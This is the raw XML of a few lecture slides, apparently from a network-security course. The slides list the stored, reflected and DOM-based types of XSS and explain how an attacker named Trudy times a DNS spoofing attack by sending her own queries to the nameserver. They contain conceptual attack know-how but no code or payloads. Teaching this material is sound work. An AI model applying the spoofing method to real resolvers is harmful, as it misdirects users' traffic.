                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Three</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Types</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="3013"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="913"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vector</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="1007"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="920"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>‘reflected’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>back</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>0: DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Based</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="927"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>client side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3759200" cy="492760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2819400" h="369570">
                <a:moveTo>
                  <a:pt x="2819400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819400" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819400" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F1F1F1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104986" y="23705"/>
            <a:ext cx="842433"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2</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759200" y="0"/>
            <a:ext cx="4572000" cy="492760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3429000" h="369570">
                <a:moveTo>
                  <a:pt x="3429000" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BEBEBE"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5623898" y="23705"/>
            <a:ext cx="842433"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1</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8331200" y="0"/>
            <a:ext cx="3860800" cy="492760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2895600" h="369570">
                <a:moveTo>
                  <a:pt x="2895600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2895600" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2895600" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D9D9D9"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11244410" y="23705"/>
            <a:ext cx="842433" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-93" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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 Spoofing (3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420278" y="1106406"/>
            <a:ext cx="11199044" cy="4631146"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>How does Trudy know when the query is sent and what it is for?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trudy, the attacker, can figure out the timing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-PK" sz="20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Querying the Nameserver Herself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Trudy acts as a regular client and sends her own query to the DNS server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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DNS servers process requests from multiple clients, Trudy can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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 the same domain name as the victim (e.g., www.example.com).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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 the exact type of record requested (e.g., A for IPv4 or AAAA for IPv6).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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Observe how the DNS server handles queries.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US"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She can then time her spoofing attack to intercept subsequent queries for the same domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endPar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400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>By making the query herself, Trudy ensures her spoofed response is precise and tailored to what the victim (or resolver) expects.</a:t>
            </a:r>
            <a:endPar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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8DB1DF-6AAA-3284-3FC1-993D3782C23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7AD1F86-481D-8901-7012-A3693E4C639D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6542202" y="5948313"/>
            <a:ext cx="6094428" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>This strategy highlights the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>lack of authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> in DNS, making it vulnerable to such exploits.</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK"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38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416807" y="450638"/>
            <a:ext cx="5362787" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Contexts</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1610360"/>
            <a:ext cx="10404687" cy="2772810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-458035">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
